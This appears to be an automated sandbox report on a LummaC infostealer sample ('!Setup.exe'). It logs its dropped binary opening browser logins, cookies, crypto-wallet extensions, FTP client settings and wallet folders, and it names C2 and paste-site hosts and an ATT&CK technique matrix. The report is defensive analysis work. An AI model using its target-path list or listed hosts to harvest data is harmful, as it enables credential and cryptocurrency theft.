      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
      Windows Management Instrumentation
      1
      DLL Side-Loading
      12
      Process Injection
      111
      Masquerading
      2
      OS Credential Dumping
      21
      Security Software Discovery
      Remote Services11
      Input Capture
      1
      Web Service
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      221
      Virtualization/Sandbox Evasion
      11
      Input Capture
      3
      Process Discovery
      Remote Desktop Protocol1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
      Process Injection
      Security Account Manager221
      Virtualization/Sandbox Evasion
      SMB/Windows Admin Shares31
      Data from Local System
      1
      Ingress Tool Transfer
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information
      NTDS1
      Application Window Discovery
      Distributed Component Object Model1
      Clipboard Data
      3
      Non-Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information
      LSA Secrets13
      File and Directory Discovery
      SSHKeylogging14
      Application Layer Protocol
      Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials25
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581738 Sample: !Setup.exe Startdate: 28/12/2024 Architecture: WINDOWS Score: 100 39 rentry.co 2->39 41 xhWaXURTqNAudpSlyMZZXaDi.xhWaXURTqNAudpSlyMZZXaDi 2->41 43 fallyjustif.click 2->43 53 Suricata IDS alerts for network traffic 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 Yara detected LummaC Stealer 2->57 61 4 other signatures 2->61 10 !Setup.exe 24 2->10         started        signatures3 59 Connects to a pastebin service (likely for C&C) 39->59 process4 process5 12 cmd.exe 2 10->12         started        file6 33 C:\Users\user\AppData\Local\...\Banned.com, PE32 12->33 dropped 63 Drops PE files with a suspicious file extension 12->63 16 Banned.com 1 12->16         started        21 cmd.exe 2 12->21         started        23 cmd.exe 1 12->23         started        25 9 other processes 12->25 signatures7 process8 dnsIp9 35 fallyjustif.click 104.21.37.209, 443, 49737, 49738 CLOUDFLARENETUS United States 16->35 37 rentry.co 104.26.3.16, 443, 49779 CLOUDFLARENETUS United States 16->37 31 C:\Users\user\...\9OMAF2HFFRD0LNMKR.ps1, HTML 16->31 dropped 45 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 16->45 47 Query firmware table information (likely to detect VMs) 16->47 49 Tries to harvest and steal ftp login credentials 16->49 51 2 other signatures 16->51 27 powershell.exe 7 16->27         started        file10 signatures11 process12 process13 29 conhost.exe 27->29         started       

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      !Setup.exe27%ReversingLabsWin32.Trojan.Generic
      !Setup.exe17%VirustotalBrowse
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://fallyjustif.click/api0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      fallyjustif.click
      104.21.37.209
      truetrue
        unknown
        rentry.co
        104.26.3.16
        truefalse
          high
          xhWaXURTqNAudpSlyMZZXaDi.xhWaXURTqNAudpSlyMZZXaDi
          unknown
          unknowntrue
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://rentry.co/feouewe5/rawfalse
              high
              https://fallyjustif.click/apitrue
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://rentry.co/static/icons/512.pnghZpowershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000049D4000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://rentry.co/whathZpowershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000049D4000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://rentry.co/powershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.000000000499C000.00000004.00000800.00020000.00000000.sdmp, 9OMAF2HFFRD0LNMKR.ps1.12.drfalse
                    high
                    https://rentry.co/static/icons/512.png9OMAF2HFFRD0LNMKR.ps1.12.drfalse
                      high
                      https://rentry.co/whatpowershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000047B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.000000000499C000.00000004.00000800.00020000.00000000.sdmp, 9OMAF2HFFRD0LNMKR.ps1.12.drfalse
                        high
                        https://rentry.co/hZpowershell.exe, 00000011.00000002.2437679697.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2437679697.00000000049D4000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.autoitscript.com/autoit3/XBanned.com, 0000000C.00000000.1737418139.0000000000275000.00000002.00000001.01000000.00000007.sdmp, Banned.com.1.dr, Ford.8.drfalse
                            high
                            https://aka.ms/pscore6lBkqpowershell.exe, 00000011.00000002.2437679697.0000000004661000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://nsis.sf.net/NSIS_ErrorError!Setup.exefalse
                                high
                                https://www.autoitscript.com/autoit3/Banned.com.1.dr, Writing.8.drfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000011.00000002.2437679697.0000000004661000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.teamviewer.com!Setup.exefalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      104.21.37.209
                                      fallyjustif.clickUnited States
                                      13335CLOUDFLARENETUStrue
                                      104.26.3.16
                                      rentry.coUnited States
                                      13335CLOUDFLARENETUSfalse
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1581738
                                      Start date and time:2024-12-28 21:34:05 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 0s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:19
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:!Setup.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@29/28@3/2
                                      EGA Information:
                                      • Successful, ratio: 50%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 34
                                      • Number of non-executed functions: 39
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Stop behavior analysis, all processes terminated
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63, 172.202.163.200
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target powershell.exe, PID 1852 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      TimeTypeDescription
                                      15:34:59API Interceptor1x Sleep call for process: !Setup.exe modified
                                      15:35:40API Interceptor18x Sleep call for process: Banned.com modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      104.21.37.209LL52387-01M4205301.xlsmGet hashmaliciousIcedIDBrowse
                                      • astrocycle.download/
                                      LL52387-01-F4448869.xlsmGet hashmaliciousIcedIDBrowse
                                      • astrocycle.download/
                                      Schedule-982347-Y6844315.xlsmGet hashmaliciousIcedIDBrowse
                                      • astrocycle.download/
                                      Vac.list07-20214862208.xlsmGet hashmaliciousIcedIDBrowse
                                      • astrocycle.download/
                                      HRcontacts7752205.xlsmGet hashmaliciousIcedIDBrowse
                                      • astrocycle.download/
                                      Formtofill4184860.xlsmGet hashmaliciousIcedIDBrowse
                                      • astrocycle.download/
                                      Outfordelivery799862.xlsmGet hashmaliciousIcedIDBrowse
                                      • astrocycle.download/
                                      Purchaseconfirmation-137606.xlsmGet hashmaliciousIcedIDBrowse
                                      • astrocycle.download/
                                      DeliveryConf535215.xlsmGet hashmaliciousIcedIDBrowse
                                      • astrocycle.download/
                                      104.26.3.16Full-Setup.exeGet hashmaliciousLummaCBrowse
                                        file.ps1Get hashmaliciousLummaC StealerBrowse
                                          grA6aqodO5.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                            SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeGet hashmaliciousXWormBrowse
                                              nkYzjyrKYK.exeGet hashmaliciousBabadedaBrowse
                                                R6IuO0fzec.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                  FluxusV2.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                    egFMhHSlmf.exeGet hashmaliciousXmrigBrowse
                                                      SecuriteInfo.com.Win64.TrojanX-gen.20834.9882.exeGet hashmaliciousUnknownBrowse
                                                        4wx72yFLka.exeGet hashmaliciousPython Stealer, CStealer, ChaosBrowse
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          rentry.coFull-Setup.exeGet hashmaliciousLummaCBrowse
                                                          • 104.26.3.16
                                                          Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 172.67.75.40
                                                          taskhost.exeGet hashmaliciousXWormBrowse
                                                          • 104.26.2.16
                                                          file.ps1Get hashmaliciousLummaC StealerBrowse
                                                          • 104.26.3.16
                                                          bUAmCazc.ps1Get hashmaliciousLummaC StealerBrowse
                                                          • 104.26.2.16
                                                          IaslcsMo.ps1Get hashmaliciousLummaC StealerBrowse
                                                          • 172.67.75.40
                                                          IaslcsMo.txt.ps1Get hashmaliciousLummaC StealerBrowse
                                                          • 172.67.75.40
                                                          owuP726k3d.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                          • 172.67.75.40
                                                          gkzHdqfg.ps1Get hashmaliciousLummaC StealerBrowse
                                                          • 172.67.75.40
                                                          xaSPJNbl.ps1Get hashmaliciousLummaCBrowse
                                                          • 172.67.75.40
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CLOUDFLARENETUSZZ2sTsJFrt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          • 104.21.38.84
                                                          FB.htmlGet hashmaliciousUnknownBrowse
                                                          • 104.17.25.14
                                                          http://prowebideas.com/dsfdgfhgdfsdfdgfhgdrwet/gdfsdfdgfhgfgdfsdfdgfh/gfsdfdgfhgfgdfsdfdgfhgdfsdfdgfhGet hashmaliciousUnknownBrowse
                                                          • 104.26.9.163
                                                          http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.17.25.14
                                                          Set-up.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.87.112
                                                          test5.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                          • 104.21.34.5
                                                          iien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.66.86
                                                          SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.2.51
                                                          oe9KS7ZHUc.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.66.86
                                                          MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.157.254
                                                          CLOUDFLARENETUSZZ2sTsJFrt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          • 104.21.38.84
                                                          FB.htmlGet hashmaliciousUnknownBrowse
                                                          • 104.17.25.14
